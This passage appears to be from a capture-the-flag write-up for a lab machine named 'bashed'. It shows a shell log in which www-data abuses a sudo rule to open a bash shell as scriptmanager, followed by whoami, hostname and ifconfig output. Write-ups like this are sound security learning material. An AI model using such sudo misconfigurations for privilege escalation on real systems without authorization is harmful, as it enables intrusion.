scriptmanager
it’s discovered previously that the www-data user can execute any command as the scriptmanager user
www-data@bashed:/var/www/html/dev$ sudo -u scriptmanager bash
sudo -u scriptmanager bash
scriptmanager@bashed:/var/www/html/dev$ whoami whoami
whoami
scriptmanager
scriptmanager@bashed:/var/www/html/dev$ hostname hostname
hostname
bashed
scriptmanager@bashed:/var/www/html/dev$ ifconfig ifconfig
ifconfig
ens33 link encap:Ethernet HWaddr 00:50:56:b9:1c:78
inet addr:10.10.10.68 Bcast:10.10.10.255 Mask:255.255.255.255
inet6 addr: dead:beef::250:56ff:feb9:1c78/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:1c78/64 Scope:Link
up broadcast running multicast mtu:1500 Metric:1
rx packets:6312 errors:0 dropped:121 overruns:0 frame:0
tx packets:1407 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
rx bytes:670395 (670.3 KB) TX bytes:1968027 (1.9 MB)
lo link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
up loopback running mtu:65536 Metric:1
rx packets:161680 errors:0 dropped:0 overruns:0 frame:0
tx packets:161680 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
rx bytes:11966320 (11.9 MB) TX bytes:11966320 (11.9 MB)I can just use the sudo privilege to spawn a bash shell as the scriptmanager user